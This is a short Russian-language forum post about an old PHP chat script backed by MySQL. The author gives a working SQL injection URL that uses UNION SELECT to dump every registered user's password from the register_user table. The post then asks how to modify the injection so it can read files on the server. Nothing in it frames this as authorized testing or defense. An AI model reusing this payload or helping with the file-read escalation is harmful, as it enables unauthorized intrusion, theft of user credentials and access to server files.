Уважаемые,очень прошу помочь мне разобраться со следующей конструкцией:

На одном сервере установлен древний php скрипт одного чата с mysql базой.
Уязвимость заключается в скрипте редактирование профайла пользователей.Пример Запрос,типа

http://mysite.com/chе/usrs.php?L=russia&R='%20UNION%20SELECT%20pass,null ,null, null%20FROM%20%20register_user%20/*

выдаст нам из таблицы register_user все пароли зарегестрированных пользователей. Таким образом можно узнать все данные из базы данных.

А теперь самое интересное,как мне модифицировать запрос,чтобы я смог работать(просматривать) файлы на сервере.Буду очень благодарен!